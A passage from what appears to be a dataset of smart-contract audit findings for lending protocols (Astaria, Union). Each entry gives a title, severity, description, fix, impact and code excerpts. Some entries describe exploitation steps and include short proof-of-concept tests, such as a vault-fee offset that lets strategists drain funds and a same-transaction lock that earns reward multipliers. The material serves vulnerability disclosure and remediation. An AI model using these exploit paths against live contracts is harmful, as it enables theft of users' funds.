refinances and reject valid refinances due to buggy mathчhighчThe math in `isValidRefinance()` checks whether the rate increased rather than decreased, resulting in invalid refinances being approved and valid refinances being rejected.\\nWhen trying to buy out a lien from `LienToken.sol:buyoutLien()`, the function calls `AstariaRouter.sol:isValidRefinance()` to check whether the refi terms are valid.\\n```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n\\nOne of the roles of this function is to check whether the rate decreased by more than 0.5%. From the docs:\\nAn improvement in terms is considered if either of these conditions is met:\\nThe loan interest rate decrease by more than 0.5%.\\nThe loan duration increases by more than 14 days.\\nThe current implementation of the function does the opposite. It calculates a `minNewRate` (which should be maxNewRate) and then checks whether the new rate is greater than that value.\\n```\\nuint256 minNewRate = uint256(lien.rate) - minInterestBPS;\\nreturn (newLien.rate >= minNewRate // rest of code\\n```\\n\\nThe result is that if the new rate has increased (or decreased by less than 0.5%), it will be considered valid, but if it has decreased by more than 0.5% (the ideal behavior) it will be rejected as invalid.чFlip the logic used to check the rate to the following:\\n```\\nuint256 maxNewRate = uint256(lien.rate) - minInterestBPS;\\nreturn (newLien.rate <= maxNewRate// rest of code\\n```\\nчUsers can perform invalid refinances with the wrong parameters.\\nUsers who should be able to perform refinances at better rates will not be able to.ч```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n -new loans \"max duration\" is not restrictedчmediumчdocument : \" Epochs PublicVaults operate around a time-based epoch system. An epoch length is defined by the strategist that deploys the PublicVault. The duration of new loans is restricted to not exceed the end of the next epoch. For example, if a PublicVault is 15 days into a 30-day epoch, new loans must not be longer than 45 days. \" but more than 2 epoch's duration can be added\\nthe max duration is not detected. add success when > next epoch\\n#AstariaTest#testBasicPublicVaultLoan\\n```\\n function testBasicPublicVaultLoan() public {\\n\\n IAstariaRouter.LienDetails memory standardLien2 =\\n IAstariaRouter.LienDetails({\\n maxAmount: 50 ether,\\n rate: (uint256(1e16) * 150) / (365 days),\\n duration: 50 days, /****** more then 14 * 2 *******/\\n maxPotentialDebt: 50 ether\\n }); \\n\\n _commitToLien({\\n vault: publicVault,\\n strategist: strategistOne,\\n strategistPK: strategistOnePK,\\n tokenContract: tokenContract,\\n tokenId: tokenId,\\n lienDetails: standardLien2, /**** use standardLien2 ****/\\n amount: 10 ether,\\n isFirstLien: true\\n });\\n }\\n```\\nчPublicVault#_afterCommitToLien\\n```\\n function _afterCommitToLien(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n // increment slope for the new lien\\n unchecked {\\n slope += LIEN_TOKEN().calculateSlope(lienId);\\n }\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN().getLien(lienId);\\n\\n uint256 epoch = Math.ceilDiv(\\n lien.start + lien.duration - START(),\\n EPOCH_LENGTH()\\n ) - 1;\\n\\n+ require(epoch <= currentEpoch + 1,\"epoch max <= currentEpoch + 1\");\\n\\n liensOpenForEpoch[epoch]++;\\n emit LienOpen(lienId, epoch);\\n }\\n```\\nчToo long durationч```\\n function testBasicPublicVaultLoan() public {\\n\\n IAstariaRouter.LienDetails memory standardLien2 =\\n IAstariaRouter.LienDetails({\\n maxAmount: 50 ether,\\n rate: (uint256(1e16) * 150) / (365 days),\\n duration: 50 days, /****** more then 14 * 2 *******/\\n maxPotentialDebt: 50 ether\\n }); \\n\\n _commitToLien({\\n vault: publicVault,\\n strategist: strategistOne,\\n strategistPK: strategistOnePK,\\n tokenContract: tokenContract,\\n tokenId: tokenId,\\n lienDetails: standardLien2, /**** use standardLien2 ****/\\n amount: 10 ether,\\n isFirstLien: true\\n });\\n }\\n```\\n -_makePayment is logically inconsistent with how lien stack is managed causing payments to multiple liens to failчmediumч`_makePayment(uint256, uint256)` looping logic is inconsistent with how `_deleteLienPosition` manages the lien stack. `_makePayment` loops from 0 to `openLiens.length` but `_deleteLienPosition` (called when a lien is fully paid off) actively compresses the lien stack. When a payment pays off multiple liens the compressing effect causes an array OOB error towards the end of the loop.\\n```\\nfunction _makePayment(uint256 collateralId, uint256 totalCapitalAvailable)\\n internal\\n{\\n uint256[] memory openLiens = liens[collateralId];\\n uint256 paymentAmount = totalCapitalAvailable;\\n for (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n }\\n}\\n```\\n\\n`LienToken.sol#_makePayment(uint256, uint256)` loops from 0 to `openLiens.Length`. This loop attempts to make a payment to each lien calling `_payment` with the current index of the loop.\\n```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, \"index out of bounds\");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n\\n`LienToken.sol#_deleteLienPosition` is called on liens when they are fully paid off. The most interesting portion of the function is how the lien is removed from the stack. We can see that all liens above the lien in question are slid down the stack and the top is popped. This has the effect of reducing the total length of the array. This is where the logical inconsistency is. If the first lien is paid off, it will be removed and the formerly second lien will now occupy it's index. So then when `_payment` is called in the next loop with the next index it won't reference the second lien since the second lien is now in the first lien index.\\nAssuming there are 2 liens on some collateral. `liens[0].amount = 100` and `liens[1].amount = 50`. A user wants to pay off their entire lien balance so they call `_makePayment(uint256, uint256)` with an amount of 150. On the first loop it calls `_payment` with an index of 0. This pays off `liens[0]`. `_deleteLienPosition` is called with index of 0 removing `liens[0]`. Because of the sliding logic in `_deleteLienPosition` `lien[1]` has now slid into the `lien[0]` position. On the second loop it calls `_payment` with an index of 1. When it tries to grab the data for the lien at that index it will revert due to OOB error because the array no long contains an index of 1.чPayment logic inside of `AuctionHouse.sol` works. `_makePayment` should be changed to mimic that logic.чLarge payment are impossible and user must manually pay off each liens separatelyч```\\nfunction _makePayment(uint256 collateralId, uint256 totalCapitalAvailable)\\n internal\\n{\\n uint256[] memory openLiens = liens[collateralId];\\n uint256 paymentAmount = totalCapitalAvailable;\\n for (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n }\\n}\\n```\\n -LienToken._payment function increases users debtчmediumчLienToken._payment function increases users debt by setting `lien.amount = _getOwed(lien)`\\n`LienToken._payment` is used by `LienToken.makePayment` function that allows borrower to repay part or all his debt.\\nAlso this function can be called by `AuctionHouse` when the lien is liquidated.\\n```\\n function _payment(\\n uint256 collateralId,\\n uint8 position,\\n uint256 paymentAmount,\\n address payer\\n ) internal returns (uint256) {\\n if (paymentAmount == uint256(0)) {\\n return uint256(0);\\n }\\n\\n\\n uint256 lienId = liens[collateralId][position];\\n Lien storage lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n require(\\n block.timestamp < end || address(msg.sender) == address(AUCTION_HOUSE),\\n \"cannot pay off an expired lien\"\\n );\\n\\n\\n address lienOwner = ownerOf(lienId);\\n bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n type(IPublicVault).interfaceId\\n );\\n\\n\\n lien.amount = _getOwed(lien);\\n\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n if (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n } else {\\n if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) {\\n // since the openLiens count is only positive when there are liens that haven't been paid off\\n // that should be liquidated, this lien should not be counted anymore\\n IPublicVault(lienOwner).decreaseEpochLienCount(\\n IPublicVault(lienOwner).getLienEpoch(end)\\n );\\n }\\n //delete liens\\n _deleteLienPosition(collateralId, position);\\n delete lienData[lienId]; //full delete\\n\\n\\n _burn(lienId);\\n }\\n\\n\\n TRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n\\n\\n emit Payment(lienId, paymentAmount);\\n return paymentAmount;\\n }\\n```\\n\\nHere lien.amount becomes lien.amount + accrued interests, because `_getOwed` do that calculation.\\n`lien.amount` is the amount that user borrowed. So actually that line has just increased user's debt. And in case if he didn't pay all amount of lien, then next time he will pay more interests.\\nExample. User borrows 1 eth. His `lien.amount` is 1eth. Then he wants to repay some part(let's say 0.5 eth). Now his `lien.amount` becomes `lien.amount + interests`. When he pays next time, he pays `(lien.amount + interests) + new interests`. So interests are acummulated on previous interests.чIssue LienToken._payment function increases users debt\\nDo not update lien.amount to _getOwed(lien).чUser borrowed amount increases and leads to lose of funds.ч```\\n function _payment(\\n uint256 collateralId,\\n uint8 position,\\n uint256 paymentAmount,\\n address payer\\n ) internal returns (uint256) {\\n if (paymentAmount == uint256(0)) {\\n return uint256(0);\\n }\\n\\n\\n uint256 lienId = liens[collateralId][position];\\n Lien storage lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n require(\\n block.timestamp < end || address(msg.sender) == address(AUCTION_HOUSE),\\n \"cannot pay off an expired lien\"\\n );\\n\\n\\n address lienOwner = ownerOf(lienId);\\n bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n type(IPublicVault).interfaceId\\n );\\n\\n\\n lien.amount = _getOwed(lien);\\n\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n if (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n } else {\\n if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) {\\n // since the openLiens count is only positive when there are liens that haven't been paid off\\n // that should be liquidated, this lien should not be counted anymore\\n IPublicVault(lienOwner).decreaseEpochLienCount(\\n IPublicVault(lienOwner).getLienEpoch(end)\\n );\\n }\\n //delete liens\\n _deleteLienPosition(collateralId, position);\\n delete lienData[lienId]; //full delete\\n\\n\\n _burn(lienId);\\n }\\n\\n\\n TRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n\\n\\n emit Payment(lienId, paymentAmount);\\n return paymentAmount;\\n }\\n```\\n -_validateCommitment fails for approved operatorsчmediumчIf a collateral token owner approves another user as an operator for all their tokens (rather than just for a given token), the validation check in `_validateCommitment()` will fail.\\nThe collateral token is implemented as an ERC721, which has two ways to approve another user:\\nApprove them to take actions with a given token (approve())\\nApprove them as an \"operator\" for all your owned tokens (setApprovalForAll())\\nHowever, when the `_validateCommitment()` function checks that the token is owned or approved by `msg.sender`, it does not accept those who are set as operators.\\n```\\nif (msg.sender != holder) {\\n require(msg.sender == operator, \"invalid request\");\\n}\\n```\\nчInclude an additional check to confirm whether the `msg.sender` is approved as an operator on the token:\\n```\\n address holder = ERC721(COLLATERAL_TOKEN()).ownerOf(collateralId);\\n address approved = ERC721(COLLATERAL_TOKEN()).getApproved(collateralId);\\n address operator = ERC721(COLLATERAL_TOKEN()).isApprovedForAll(holder);\\n\\n if (msg.sender != holder) {\\n require(msg.sender == operator || msg.sender == approved, \"invalid request\");\\n }\\n```\\nчApproved operators of collateral tokens will be rejected from taking actions with those tokens.ч```\\nif (msg.sender != holder) {\\n require(msg.sender == operator, \"invalid request\");\\n}\\n```\\n -timeToEpochEnd calculates backwards, breaking protocol mathчmediumчWhen a lien is liquidated, it calls `timeToEpochEnd()` to determine if a liquidation accountant should be deployed and we should adjust the protocol math to expect payment in a future epoch. Because of an error in the implementation, all liquidations that will pay out in the current epoch are set up as future epoch liquidations.\\nThe `liquidate()` function performs the following check to determine if it should set up the liquidation to be paid out in a future epoch:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n\\nThis check expects that `timeToEpochEnd()` will return the time until the epoch is over. However, the implementation gets this backwards:\\n```\\nfunction timeToEpochEnd() public view returns (uint256) {\\n uint256 epochEnd = START() + ((currentEpoch + 1) * EPOCH_LENGTH());\\n\\n if (epochEnd >= block.timestamp) {\\n return uint256(0);\\n }\\n\\n return block.timestamp - epochEnd;\\n}\\n```\\n\\nIf `epochEnd >= block.timestamp`, that means that there IS remaining time in the epoch, and it should perform the calculation to return `epochEnd - block.timestamp`. In the opposite case, where `epochEnd <= block.timestamp`, it should return zero.\\nThe result is that the function returns 0 for any epoch that isn't over. Since `0 < COLLATERAL_TOKEN.auctionWindow())`, all liquidated liens will trigger a liquidation accountant and the rest of the accounting for future epoch withdrawals.чFix the `timeToEpochEnd()` function so it calculates the remaining time properly:\\n```\\nfunction timeToEpochEnd() public view returns (uint256) {\\n uint256 epochEnd = START() + ((currentEpoch + 1) * EPOCH_LENGTH());\\n\\n if (epochEnd <= block.timestamp) {\\n return uint256(0);\\n }\\n\\n return epochEnd - block.timestamp; //\\n}\\n```\\nчAccounting for a future epoch withdrawal causes a number of inconsistencies in the protocol's math, the impact of which vary depending on the situation. As a few examples:\\nIt calls `decreaseEpochLienCount()`. This has the effect of artificially lowering the number of liens in the epoch, which will cause the final liens paid off in the epoch to revert (and will let us process the epoch earlier than intended).\\nIt sets the payee of the lien to the liquidation accountant, which will pay out according to the withdrawal ratio (whereas all funds should be staying in the vault).\\nIt calls `increaseLiquidationsExpectedAtBoundary()`, which can throw off the math when processing the epoch.ч```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n -_payment() function transfers full paymentAmount, overpaying first liensчmediumчThe `_payment()` function sends the full `paymentAmount` argument to the lien owner, which both (a) overpays lien owners if borrowers accidentally overpay and (b) sends the first lien owner all the funds for the entire loop of a borrower is intending to pay back multiple loans.\\nThere are two `makePayment()` functions in LienToken.sol. One that allows the user to specific a `position` (which specific lien they want to pay back, and another that iterates through their liens, paying each back.\\nIn both cases, the functions call out to `_payment()` with a `paymentAmount`, which is sent (in full) to the lien owner.\\n```\\nTRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n```\\n\\nThis behavior can cause problems in both cases.\\nThe first case is less severe: If the user is intending to pay off one lien, and they enter a `paymentAmount` greater than the amount owed, the function will send the full `paymentAmount` to the lien owner, rather than just sending the amount owed.\\nThe second case is much more severe: If the user is intending to pay towards all their loans, the `_makePayment()` function loops through open liens and performs the following:\\n```\\nuint256 paymentAmount = totalCapitalAvailable;\\nfor (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n}\\n```\\n\\nThe `_payment()` function is called with the first lien with `paymentAmount` set to the full amount sent to the function. The result is that this full amount is sent to the first lien holder, which could greatly exceed the amount they are owed.чIssue _payment() function transfers full paymentAmount, overpaying first liens\\nIn `_payment()`, if `lien.amount < paymentAmount`, set `paymentAmount = lien.amount`.\\nThe result will be that, in this case, only `lien.amount` is transferred to the lien owner, and this value is also returned from the function to accurately represent the amount that was paid.чA user who is intending to pay off all their loans will end up paying all the funds they offered, but only paying off their first lien, potentially losing a large amount of funds.ч```\\nTRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n```\\n -_getInterest() function uses block.timestamp instead of the inputted timestampчmediumчThe `_getInterest()` function takes a timestamp as input. However, in a crucial check in the function, it uses `block.timestamp` instead. The result is that other functions expecting accurate interest amounts will receive incorrect values.\\nThe `_getInterest()` function takes a lien and a timestamp as input. The intention is for it to calculate the amount of time that has passed in the lien (delta_t) and multiply this value by the rate and the amount to get the interest generated by this timestamp.\\nHowever, the function uses the following check regarding the timestamp:\\n```\\nif (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n} \\n```\\n\\nBecause this check uses `block.timestamp` before returning the maximum interest payment, the function will incorrectly determine which path to take, and return an incorrect interest value.чChange `block.timestamp` to `timestamp` so that the if statement checks correctly.чThere are two negative consequences that can come from this miscalculation:\\nif the function is called when the lien is over (block.timestamp >= lien.start + lien.duration) to check an interest amount from a timestamp during the lien, it will incorrectly return the maximum interest value\\nIf the function is called when the lien is active for a timestamp long after the lien is over, it will skip the check to return maximum value and return the value that would have been generated if interest kept accruing indefinitely (using delta_t = uint256(timestamp.safeCastTo32() - lien.last);)\\nThis `_getInterest()` function is used in many crucial protocol functions (_getOwed(), `calculateSlope()`, `changeInSlope()`, getTotalDebtForCollateralToken()), so these incorrect values can have surprising and unexpected negative impacts on the protocol.ч```\\nif (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n} \\n```\\n -Vault Fee uses incorrect offset leading to wildly incorrect value, allowing strategists to steal all fundsчmediumч`VAULT_FEE()` uses an incorrect offset, returning a number ~1e16X greater than intended, providing strategists with unlimited access to drain all vault funds.\\nWhen using ClonesWithImmutableArgs, offset values are set so that functions representing variables can retrieve the correct values from storage.\\nIn the ERC4626-Cloned.sol implementation, `VAULT_TYPE()` is given an offset of 172. However, the value before it is a `uint8` at the offset 164. Since a `uint8` takes only 1 byte of space, `VAULT_TYPE()` should have an offset of 165.\\nI put together a POC to grab the value of `VAULT_FEE()` in the test setup:\\n```\\nfunction testVaultFeeIncorrectlySet() public {\\n Dummy721 nft = new Dummy721();\\n address tokenContract = address(nft);\\n uint256 tokenId = uint256(1);\\n address publicVault = _createPublicVault({\\n strategist: strategistOne,\\n delegate: strategistTwo,\\n epochLength: 14 days\\n });\\n uint fee = PublicVault(publicVault).VAULT_FEE();\\n console.log(fee)\\n assert(fee == 5000); // 5000 is the value that was meant to be set\\n}\\n```\\n\\nIn this case, the value returned is > 3e20.чSet the offset for `VAULT_FEE()` to 165. I tested this value in the POC I created and it correctly returned the value of 5000.чThis is a highly critical bug. `VAULT_FEE()` is used in `_handleStrategistInterestReward()` to determine the amount of tokens that should be allocated to `strategistUnclaimedShares`.\\n```\\nif (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000); //VAULT_FEE is a basis point\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n```\\n\\nThe result is that strategistUnclaimedShares will be billions of times higher than the total interest generated, essentially giving strategist access to withdraw all funds from their vaults at any time.ч```\\nfunction testVaultFeeIncorrectlySet() public {\\n Dummy721 nft = new Dummy721();\\n address tokenContract = address(nft);\\n uint256 tokenId = uint256(1);\\n address publicVault = _createPublicVault({\\n strategist: strategistOne,\\n delegate: strategistTwo,\\n epochLength: 14 days\\n });\\n uint fee = PublicVault(publicVault).VAULT_FEE();\\n console.log(fee)\\n assert(fee == 5000); // 5000 is the value that was meant to be set\\n}\\n```\\n -Bids cannot be created within timeBuffer of completion of a max duration auctionчmediumчThe auction mechanism is intended to watch for bids within `timeBuffer` of the end of the auction, and automatically increase the remaining duration to `timeBuffer` if such a bid comes in.\\nThere is an error in the implementation that causes all bids within `timeBuffer` of the end of a max duration auction to revert, effectively ending the auction early and cutting off bidders who intended to wait until the end.\\nIn the `createBid()` function in AuctionHouse.sol, the function checks if a bid is within the final `timeBuffer` of the auction:\\n```\\nif (firstBidTime + duration - block.timestamp < timeBuffer)\\n```\\n\\nIf so, it sets `newDuration` to equal the amount that will extend the auction to `timeBuffer` from now:\\n```\\nuint64 newDuration = uint256( duration + (block.timestamp + timeBuffer - firstBidTime) ).safeCastTo64();\\n```\\n\\nIf this `newDuration` doesn't extend beyond the `maxDuration`, this works great. However, if it does extend beyond `maxDuration`, the following code is used to update duration:\\n```\\nauctions[tokenId].duration = auctions[tokenId].maxDuration - firstBidTime;\\n```\\n\\nThis code is incorrect. `maxDuration` will be a duration for the contest (currently set to 3 days), whereas `firstTimeBid` is a timestamp for the start of the auction (current timestamps are > 1 billion).\\nSubtracting `firstTimeBid` from `maxDuration` will underflow, which will revert the function.чChange this assignment to simply assign `duration` to `maxDuration`, as follows:\\n```\\nauctions[tokenId].duration = auctions[tokenId].maxDuration\\n```\\nчBidders who expected to wait until the end of the auction to vote will be cut off from voting, as the auction will revert their bids.\\nVaults whose collateral is up for auction will earn less than they otherwise would have.ч```\\nif (firstBidTime + duration - block.timestamp < timeBuffer)\\n```\\n -Loan can be written off by anybody before overdue delay expiresчhighчWhen a borrower takes a second loan after a loan that has been written off, this second loan can be written off instantly by any other member due to missing update of last repay block, leaving the staker at a loss.\\nA staker stakes and vouches a borrower\\nthe borrower borrows calling UToken:borrow: `accountBorrows[borrower].lastRepay` is updated with the current block number\\nthe staker writes off the entire debt of the borrower calling `UserManager:debtWriteOff`. In the internal call to `UToken:debtWriteOff` the principal is set to zero but `accountBorrows[borrower].lastRepay` is not updated\\n90 days pass and a staker vouches for the same borrower\\nthe borrower borrows calling UToken:borrow: `accountBorrows[borrower].lastRepay` is not set to the current block since non zero and stays to the previous value.\\n`accountBorrows[borrower].lastRepay` is now old enough to allow the check in `UserManager:debtWriteOff` at line 738 to pass. The debt is written off by any other member immediatly after the loan is given. The staker looses the staked amount immediatly.\\n```\\n if (block.number <= lastRepay + overdueBlocks + maxOverdueBlocks) {\\n if (staker != msg.sender) revert AuthFailed();\\n }\\n```\\n\\nThe last repay block is still stale and a new loan can be taken and written off immediatly many times as long as stakers are trusting the borrower\\nNote that this can be exploited maliciously by the borrower, who can continously ask for loans and then write them off immediatly.чIssue Loan can be written off by anybody before overdue delay expires\\nReset `lastRepay` for the borrower to 0 when the debt is written off completely\\n```\\n function debtWriteOff(address borrower, uint256 amount) external override whenNotPaused onlyUserManager {\\n uint256 oldPrincipal = getBorrowed(borrower);\\n uint256 repayAmount = amount > oldPrincipal ? oldPrincipal : amount;\\n\\n// Add the line below\\n if (oldPrincipal == repayAmount) accountBorrows[borrower].lastRepay = 0;\\n accountBorrows[borrower].principal = oldPrincipal - repayAmount;\\n totalBorrows -= repayAmount;\\n }\\n```\\nчThe staker of the loan looses the staked amount well before the overdue delay is expiredч```\\n if (block.number <= lastRepay + overdueBlocks + maxOverdueBlocks) {\\n if (staker != msg.sender) revert AuthFailed();\\n }\\n```\\n -A stake that has just been locked gets full reward multiplierчmediumчA staker gets rewarded with full multiplier even if its stake has just been locked. Multiplier calculation should take into account the duration of the lock.\\nA staker stakes an amount of tokens.\\nThe staker waits for some time\\nThe staker has control of another member (bribe, ...)\\nThe staker vouches this other member\\nThe member borrows\\nThe staker calls `Comptroller:withdrawRewards` and gets an amount of rewards with a multiplier corresponding to a locked stake\\nThe member repays the loan\\nNote that steps 4 to 7 can be made in one tx, so no interest is paid at step 7.\\nThe result is that the staker can always get the full multiplier for rewards, without ever putting any funds at risk, nor any interest being paid. This is done at the expense of other honest stakers, who get proprotionally less of the rewards dripped into the comptroller.\\nFor a coded PoC replace the test `\"staker with locked balance gets more rewards\"` in `staking.ts` with the following\\n```\\n it(\"PoC: staker with locked balance gets more rewards even when just locked\", async () => {\\n const trustAmount = parseUnits(\"2000\");\\n const borrowAmount = parseUnits(\"1800\");\\n const [account, staker, borrower] = members;\\n\\n const [accountStaked, borrowerStaked, stakerStaked] = await helpers.getStakedAmounts(\\n account,\\n staker,\\n borrower\\n );\\n\\n expect(accountStaked).eq(borrowerStaked);\\n expect(borrowerStaked).eq(stakerStaked);\\n\\n await helpers.updateTrust(staker, borrower, trustAmount);\\n \\n await roll(10);\\n await helpers.borrow(borrower, borrowAmount); // borrows just after withdrawing\\n \\n const [accountMultiplier, stakerMultiplier] = await helpers.getRewardsMultipliers(account, staker);\\n console.log(\"accountMultiplier: \", accountMultiplier);\\n console.log(\"StakerMultiplier: \", stakerMultiplier);\\n expect(accountMultiplier).lt(stakerMultiplier); // the multiplier is larger even if just locked\\n });\\n```\\nчIssue A stake that has just been locked gets full reward multiplier\\nShould introduce the accounting of the duration of a lock into the rewards calculation, so that full multiplier is given only to a lock that is as old as the stake itself.чA staker can get larger rewards designed for locked stakes by locking and unlocking in the same tx.ч```\\n it(\"PoC: staker with locked balance gets more rewards even when just locked\", async () => {\\n const trustAmount = parseUnits(\"2000\");\\n const borrowAmount = parseUnits(\"1800\");\\n const [account, staker, borrower] = members;\\n\\n const [accountStaked, borrowerStaked, stakerStaked] = await helpers.getStakedAmounts(\\n account,\\n staker,\\n borrower\\n );\\n\\n expect(accountStaked).eq(borrowerStaked);\\n expect(borrowerStaked).eq(stakerStaked);\\n\\n await helpers.updateTrust(staker, borrower, trustAmount);\\n \\n await roll(10);\\n await helpers.borrow(borrower, borrowAmount); // borrows just after withdrawing\\n \\n const [accountMultiplier, stakerMultiplier] = await helpers.getRewardsMultipliers(account, staker);\\n console.log(\"accountMultiplier: \", accountMultiplier);\\n console.log(\"StakerMultiplier: \", stakerMultiplier);\\n expect(accountMultiplier).lt(stakerMultiplier); // the multiplier is larger even if just locked\\n });\\n```\\n -updateTrust() vouchers also need check maxVouchersчmediumчmaxVouchers is to prevent the “vouchees“ array from getting too big and the loop will have the GAS explosion problem, but “vouchers“have the same problem, if you don't check the vouchers array, it is also possible that vouchers are big and cause updateLocked() to fail\\nvouchees check < maxVouchers ,but vouchers don't check\\n```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); /**** don't check maxVouchers****/\\n```\\nч```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n+ if (voucherIndex >= maxVouchers) revert MaxVouchees();\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); \\n```\\nчit is also possible that vouchers are big and cause updateLocked() to failч```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); /**** don't check maxVouchers****/\\n```\\n -Unsafe downcasting arithmetic operation in UserManager related contract and in UToken.solчmediumчThe value is unsafely downcasted and truncated from uint256 to uint96 or uint128 in UserManager related contract and in UToken.sol.\\nvalue can unsafely downcasted. let us look at it cast by cast.\\nIn UserManagerDAI.sol\\n```\\n function stakeWithPermit(\\n uint256 amount,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n ) external whenNotPaused {\\n IDai erc20Token = IDai(stakingToken);\\n erc20Token.permit(msg.sender, address(this), nonce, expiry, true, v, r, s);\\n\\n stake(uint96(amount));\\n }\\n```\\n\\nas we can see, the user's staking amount is downcasted from uint256 to uint96.\\nthe same issue exists in UserManagerERC20.sol\\nIn the context of UToken.sol, a bigger issue comes.\\nUser invokes the borrow function in UToken.sol\\n```\\n function borrow(address to, uint256 amount) external override onlyMember(msg.sender) whenNotPaused nonReentrant {\\n```\\n\\nand\\n```\\n // Withdraw the borrowed amount of tokens from the assetManager and send them to the borrower\\n if (!assetManagerContract.withdraw(underlying, to, amount)) revert WithdrawFailed();\\n\\n // Call update locked on the userManager to lock this borrowers stakers. This function\\n // will revert if the account does not have enough vouchers to cover the borrow amount. ie\\n // the borrower is trying to borrow more than is able to be underwritten\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n```\\n\\nnote when we withdraw fund from asset Manager, we use a uint256 amount, but we downcast it to uint96(amount + fee) when updating the locked. The accounting would be so broken if the amount + fee is a larger than uint96 number.\\nSame issue in the function UToken.sol# _repayBorrowFresh\\n```\\n function _repayBorrowFresh(\\n address payer,\\n address borrower,\\n uint256 amount\\n ) internal {\\n```\\n\\nand\\n```\\n // Update the account borrows to reflect the repayment\\n accountBorrows[borrower].principal = borrowedAmount - repayAmount;\\n accountBorrows[borrower].interest = 0;\\n```\\n\\nand\\n```\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n\\nwe use a uint256 number for borrowedAmount - repayAmount, but downcast it to uint96(repayAmount - interest) when updating the lock!\\nNote there are index-related downcasting, the damage is small , comparing the accounting related downcasting.because it is difference to have uint128 amount of vouch, but I still want to mention it: the index is unsafely downcasted from uint256 to uint128\\n```\\n // Get the new index that this vouch is going to be inserted at\\n // Then update the voucher indexes for this borrower as well as\\n // Adding the Vouch the the vouchers array for this staker\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0));\\n\\n // Add the voucherIndex of this new vouch to the vouchees array for this\\n // staker then update the voucheeIndexes with the 